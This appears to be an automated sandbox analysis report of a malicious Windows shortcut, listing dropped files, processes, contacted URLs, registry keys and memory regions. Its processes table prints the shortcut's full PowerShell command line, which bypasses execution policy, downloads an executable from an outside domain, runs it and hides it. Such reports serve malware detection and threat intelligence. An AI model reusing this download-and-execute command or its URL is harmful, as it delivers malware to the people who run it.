Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Transfer.lnk
|
MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Has command line arguments, Icon number=0,
ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
|
initial sample
|
 |
|
|
C:\Users\user\Desktop\Ojtjewi.exe
|
HTML document, ASCII text, with very long lines (394)
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_25sjz4ab.5hb.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3ez5ygt0.uqv.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5lamja0e.ikb.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hy5gb3l4.dyu.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BIKI9XNTYCRZ3YC349AU.temp
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\e19ffc3c42b086ac.customDestinations-ms (copy)
|
data
|
dropped
|
||
|
C:\Windows\appcompat\Programs\Amcache.hve
|
MS Windows registry file, NT/2000 or above
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle hIdDEn Hiddden -Command OpenWith.exe;(new-object
System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/jlow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.exe','Ojtjewi.exe');./'Ojtjewi.exe';(get-item
'Ojtjewi.exe').Attributes += 'Hidden';
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://www.sodiumlaurethsulfatedesyroyer.com
|
unknown
|
|
|
|
https://www.sodiumlaurethsulfatedesyroyer.com/ow
|
unknown
|
|
|
|
https://www.sodiumlaurethsulfatedesyroyer.com/jlow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.exe
|
188.114.96.3
|
|
|
|
https://www.sodiumlaurethsulfatedesyroyer.com/jlow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrg
|
unknown
|
|
|
|
https://www.sodiumlaurethsulfatedesyroyer.com
|
unknown
|
|
|
|
https://www.sodiumlaurethsulfatedesyroyer.com/
|
unknown
|
|
|
|
https://www.cloudflare.com/learning/access-management/phishing-attack/
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
https://aka.ms/winsvr-2022-pshelp
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
http://www.microsoft.co
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://aka.ms/winsvr-2022-pshelpX
|
unknown
|
||
|
http://upx.sf.net
|
unknown
|
||
|
http://go.micros
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://www.cloudflare.com/5xx-error-landing
|
unknown
|
||
|
http://schemas.xmlsoap.org/wsdl/
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
There are 16 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
www.sodiumlaurethsulfatedesyroyer.com
|
188.114.96.3
|
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
188.114.96.3
|
www.sodiumlaurethsulfatedesyroyer.com
|
European Union
|
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
1FDD83B3000
|
trusted library allocation
|
page read and write
|
||
|
C12B1F8000
|
stack
|
page read and write
|
||
|
1FDD5AF9000
|
heap
|
page read and write
|
||
|
1FDEFE2C000
|
heap
|
page read and write
|
||
|
7FFD9B4C0000
|
trusted library allocation
|
page read and write
|
||
|
1FDD8D4D000
|
trusted library allocation
|
page read and write
|
||
|
1FDEFDB0000
|
heap
|
page read and write
|
||
|
1FDD970B000
|
trusted library allocation
|
page read and write
|
||
|
1FDD78E0000
|
heap
|
page execute and read and write
|
||
|
C12C0CE000
|
stack
|
page read and write
|
||
|
7FFD9B730000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B7D0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B750000
|
trusted library allocation
|
page read and write
|
||
|
1FDD5A60000
|
heap
|
page read and write
|
||
|
7FFD9B6E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B6C0000
|
trusted library allocation
|
page read and write
|
||
|
1FDD7920000
|
trusted library allocation
|
page read and write
|
||
|
1FDD5BF0000
|
heap
|
page read and write
|
||
|
1FDEFE1F000
|
heap
|
page read and write
|
||
|
7FFD9B81C000
|
trusted library allocation
|
page read and write
|
||
|
1FDD7A20000
|
heap
|
page read and write
|
||
|
1FDD5B55000
|
heap
|
page read and write
|
||
|
1FDD5AC0000
|
heap
|
page read and write
|
||
|
1FDD7C5A000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B920000
|
trusted library allocation
|
page read and write
|
||
|
1FDD5B32000
|
heap
|
page read and write
|
||
|
1FDF0280000
|
heap
|
page read and write
|
||
|
C12B1FE000
|
stack
|
page read and write
|
||
|
7FFD9B7B0000
|
trusted library allocation
|
page read and write
|
||
|
1FDEFF87000
|
heap
|
page read and write
|
||
|
1FDEFEB9000
|
heap
|
page read and write
|
||
|
C12B179000
|
stack
|
page read and write
|
||
|
1FDD5B50000
|
heap
|
page read and write
|
||
|
7DF4642F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FDD98CB000
|
trusted library allocation
|
page read and write
|
||
|
1FDEFEAB000
|
heap
|
page read and write
|
||
|
7FFD9B720000
|
trusted library allocation
|
page read and write
|
||
|
1FDE7D1A000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B4B2000
|
trusted library allocation
|
page read and write
|
||
|
1FDEFBC6000
|
heap
|
page read and write
|
||
|
1FDE7A51000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B8F0000
|
trusted library allocation
|
page read and write
|
||
|
1FDE7A31000
|
trusted library allocation
|
page read and write
|
||
|
1FDD8BA3000
|
trusted library allocation
|
page read and write
|
||
|
1FDD78B0000
|
heap
|
page readonly
|
||
|
C12B5FB000
|
stack
|
page read and write
|
||
|
1FDE7AA1000
|
trusted library allocation
|
page read and write
|
||
|
1FDEFF31000
|
heap
|
page read and write
|
||
|
7FFD9B650000
|
trusted library allocation
|
page read and write
|
||
|
1FDD5B9E000
|
heap
|
page read and write
|
||
|
7FFD9B4B4000
|
trusted library allocation
|
page read and write
|
||
|
1FDD91A8000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B596000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B4D0000
|
trusted library allocation
|
page read and write
|
||
|
C12C14D000
|
stack
|
page read and write
|
||
|
C12B57F000
|
stack
|
page read and write
|
||
|
C12AA95000
|
stack
|
page read and write
|
||
|
7FFD9B780000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B740000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B4B3000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FDD5B9A000
|
heap
|
page read and write
|
||
|
1FDEFF29000
|
heap
|
page read and write
|
||
|
7FFD9B830000
|
trusted library allocation
|
page read and write
|
||
|
1FDD8C71000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B8A3000
|
trusted library allocation
|
page read and write
|
||
|
1FDD5960000
|
heap
|
page read and write
|
||
|
7FFD9B800000
|
trusted library allocation
|
page read and write
|
||
|
1FDD978B000
|
trusted library allocation
|
page read and write
|
||
|
1FDEFF49000
|
heap
|
page read and write
|
||
|
1FDE7D26000
|
trusted library allocation
|
page read and write
|
||
|
1FDD78D0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B809000
|
trusted library allocation
|
page read and write
|
||
|
C12B07E000
|
stack
|
page read and write
|
||
|
C12ABDE000
|
stack
|
page read and write
|
||
|
1FDD84B7000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B7E3000
|
trusted library allocation
|
page read and write
|
||
|
1FDEFF9C000
|
heap
|
page read and write
|
||
|
1FDEFEA2000
|
heap
|
page read and write
|
||
|
7FFD9B566000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B964000
|
trusted library allocation
|
page read and write
|
||
|
C12B47E000
|
stack
|
page read and write
|
||
|
1FDF028E000
|
heap
|
page read and write
|
||
|
1FDEFF01000
|
heap
|
page read and write
|
||
|
1FDD7870000
|
trusted library allocation
|
page read and write
|
||
|
1FDD78C7000
|
heap
|
page execute and read and write
|
||
|
7FFD9B670000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FDE7D1E000
|
trusted library allocation
|
page read and write
|
||
|
1FDD8389000
|
trusted library allocation
|
page read and write
|
||
|
C12AF7E000
|
stack
|
page read and write
|
||
|
C12B379000
|
stack
|
page read and write
|
||
|
C12B3FE000
|
stack
|
page read and write
|
||
|
7FFD9B918000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B56C000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B820000
|
trusted library allocation
|
page read and write
|
||
|
1FDD5AA0000
|
heap
|
page read and write
|
||
|
1FDD8BDF000
|
trusted library allocation
|
page read and write
|
||
|
1FDEFBD6000
|
heap
|
page read and write
|
||
|
1FDD97AA000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B7E0000
|
trusted library allocation
|
page read and write
|
||
|
1FDD5D25000
|
heap
|
page read and write
|
||
|
1FDEFEC4000
|
heap
|
page read and write
|
||
|
1FDD78F0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B7C0000
|
trusted library allocation
|
page read and write
|
||
|
1FDEFCA0000
|
heap
|
page read and write
|
||
|
7FFD9B700000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B8C0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B900000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B770000
|
trusted library allocation
|
page read and write
|
||
|
1FDEFC08000
|
heap
|
page read and write
|
||
|
7FFD9B6D0000
|
trusted library allocation
|
page read and write
|
||
|
1FDD94B1000
|
trusted library allocation
|
page read and write
|
||
|
1FDEFFD0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B7A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B8E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
C12AB9E000
|
stack
|
page read and write
|
||
|
1FDEFF1C000
|
heap
|
page read and write
|
||
|
1FDD7AB9000
|
trusted library allocation
|
page read and write
|
||
|
1FDD9065000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B910000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B8B0000
|
trusted library allocation
|
page read and write
|
||
|
7DF464300000
|
trusted library allocation
|
page execute and read and write
|
||
|
C12B277000
|
stack
|
page read and write
|
||
|
7FFD9B962000
|
trusted library allocation
|
page read and write
|
||
|
1FDD5D40000
|
heap
|
page read and write
|
||
|
1FDD83AF000
|
trusted library allocation
|
page read and write
|
||
|
1FDEFD80000
|
heap
|
page execute and read and write
|
||
|
7FFD9B804000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B940000
|
trusted library allocation
|
page read and write
|
||
|
1FDEFEE7000
|
heap
|
page read and write
|
||
|
7FFD9B680000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FDEFBA0000
|
heap
|
page read and write
|
||
|
C12B0FF000
|
stack
|
page read and write
|
||
|
1FDD5B71000
|
heap
|
page read and write
|
||
|
7FFD9B760000
|
trusted library allocation
|
page read and write
|
||
|
C12AE7E000
|
stack
|
page read and write
|
||
|
7FFD9B570000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B840000
|
trusted library allocation
|
page read and write
|
||
|
1FDEFB72000
|
heap
|
page read and write
|
||
|
1FDF02A0000
|
heap
|
page read and write
|
||
|
7FFD9B970000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B560000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B5D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
C12B4FC000
|
stack
|
page read and write
|
||
|
C12B2FA000
|
stack
|
page read and write
|
||
|
1FDD5D45000
|
heap
|
page read and write
|
||
|
1FDD83A1000
|
trusted library allocation
|
page read and write
|
||
|
1FDD5A40000
|
heap
|
page read and write
|
||
|
7FFD9B6F0000
|
trusted library allocation
|
page read and write
|
||
|
1FDD5B5D000
|
heap
|
page read and write
|
||
|
7FFD9B818000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B790000
|
trusted library allocation
|
page read and write
|
||
|
1FDE7D28000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B8A0000
|
trusted library allocation
|
page read and write
|
||
|
C12AFFB000
|
stack
|
page read and write
|
||
|
1FDEFEA0000
|
heap
|
page read and write
|
||
|
7FFD9B50C000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FDD9842000
|
trusted library allocation
|
page read and write
|
||
|
1FDD838E000
|
trusted library allocation
|
page read and write
|
||
|
1FDEFB40000
|
heap
|
page read and write
|
||
|
1FDE7A61000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B661000
|
trusted library allocation
|
page read and write
|
||
|
7DF4642E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FDD78C0000
|
heap
|
page execute and read and write
|
||
|
7FFD9B8D0000
|
trusted library allocation
|
page read and write
|
||
|
1FDD7A31000
|
trusted library allocation
|
page read and write
|
||
|
C12BFCE000
|
stack
|
page read and write
|
||
|
7FFD9B810000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B4BD000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FDEFF3C000
|
heap
|
page read and write
|
||
|
C12AEFD000
|
stack
|
page read and write
|
||
|
7FFD9B710000
|
trusted library allocation
|
page read and write
|
||
|
C12C04E000
|
stack
|
page read and write
|
||
|
1FDD9630000
|
trusted library allocation
|
page read and write
|
||
|
1FDEFA38000
|
heap
|
page read and write
|
||
|
7FFD9B6A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FDD83C7000
|
trusted library allocation
|
page read and write
|
||
|
1FDEFBA2000
|
heap
|
page read and write
|
||
|
1FDD78A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B66A000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B6B0000
|
trusted library allocation
|
page read and write
|
||
|
C12AB1E000
|
stack
|
page read and write
|
||
|
7FFD9B692000
|
trusted library allocation
|
page read and write
|
||
|
1FDEFDDA000
|
heap
|
page read and write
|
||
|
7FFD9B4CB000
|
trusted library allocation
|
page read and write
|
||
|
1FDD8D25000
|
trusted library allocation
|
page read and write
|
||
|
1FDEFE02000
|
heap
|
page read and write
|
||
|
1FDD5D20000
|
heap
|
page read and write
|
There are 177 hidden memdumps, click here to show them.